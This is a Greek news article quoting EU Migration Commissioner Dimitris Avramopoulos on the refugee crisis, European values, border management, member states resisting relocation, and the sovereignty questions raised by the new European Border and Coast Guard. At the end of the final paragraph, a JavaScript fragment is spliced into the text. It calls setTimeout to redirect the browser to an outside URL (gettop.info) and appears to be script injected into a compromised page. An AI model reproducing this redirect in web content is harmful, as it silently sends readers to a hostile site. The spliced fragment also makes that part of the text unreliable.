Αβραμόπουλος: Δοκιμάζονται οι αρχές και οι αξίες πάνω στις οποίες χτίστηκε η Ευρώπη

0
5

 

Μιλώντας σε ελληνικά Μέσα Ενημέρωσης, ο Επίτροπος Μετανάστευσης Δημήτρης Αβραμόπουλος σημείωσε πως «η Ευρώπη δεν πρόκειται να οδηγηθεί σε απομονωτισμό, αντίθετα είναι η ώρα να δοκιμάσει την αντοχή των αξιών της στο εσωτερικό» και συμπλήρωσε: «Η έννοια Ευρώπη-φρούριο μας παραπέμπει σε αλλοτινούς καιρούς. Η πρώτη φορά που χρησιμοποιήθηκε ήταν το 1939. Δεν είναι αυτό η Ευρώπη που φτιάχτηκε τα τελευταία 70 χρόνια. Η Ευρώπη χτίστηκε με πολύ όνειρο, αλλά και με τις δραματικές εμπειρίες της γενιάς που πήρε την απόφαση να δημιουργήσει ένα περιβάλλον ασφάλειας, ειρήνης και συνεργασίας».

Όπως ανέφερε ο Επίτροπος «με την προσφυγική κρίση δοκιμάζονται οι αρχές και οι αξίες πάνω στις οποίες χτίστηκε η Ευρώπη. Ανθρωπιά, πολιτισμός, ανοιχτή κοινωνία, δημοκρατία, σεβασμός στα ανθρώπινα δικαιώματα, αντιμετώπιση όλων αυτών των ανθρώπων με αξιοπρέπεια. Βέβαια όλα αυτά είναι η μία όψη του θέματος. Η άλλη είναι ότι κάποτε η Ευρώπη έπρεπε να βάλει τάξη σε αυτό που ήταν και η βασική της αδυναμία δηλαδή τη διαχείριση των συνόρων της».

Και συμπλήρωσε «Η Ευρώπη δεν απειλείται από εχθρούς, γιατί όλοι αυτοί οι άνθρωποι, κυρίως εκείνοι που περνάνε από την Ελλάδα, είναι πολιτικοί πρόσφυγες και έχει υποχρέωση και η χώρα και η Ευρώπη να τους αντιμετωπίζει με ευαισθησία και αξιοπρέπεια δημιουργώντας όμως και τους αντίστοιχους όρους. Είναι όμως ξεκάθαρο το μήνυμα ότι οι παράτυποι μετανάστες θα βρίσκουν τις πόρτες κλειστές».

Επίσης, έστειλε πολιτικό μήνυμα στις ευρωπαϊκές κυβερνήσεις που αρνούνται να εφαρμόσουν τις αποφάσεις της ΕΕ, κυρίως στα θέματα της μετεγκατάστασης: «Γνώριζαν και γνωρίζουν ότι για να είναι μέλη της ευρωπαϊκής οικογένειας πρέπει να σέβονται και να τηρούν τη νομοθεσία, τις αρχές και τις πολιτικές που από κοινού αποφασίζουμε».

Όσον αφορά στην Ευρωπαϊκή Συνοριοφυλακή και Ακτοφυλακή που παρουσιάστηκαν σήμερα και κατά πόσο πλήττεται η εθνική κυριαρχία ο κ. Αβραμόπουλος είπε: «Ξεκαθαρίστηκε ότι δεν τίθεται θέμα αμφισβήτησης της εθνικής κυριαρχίας. Χρειάζεται απλώς η συναίνεση του κράτους- μέλους ή να υποβληθεί το αίτημα. Και οι συνεννοήσεις που έγιναν για να φτάσουμε εδώ σήμερα, έγιναν σε επίπεδο κρατών. Αφού κοινά αποφασίστηκε, κοινά θα εφαρμοστεί». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here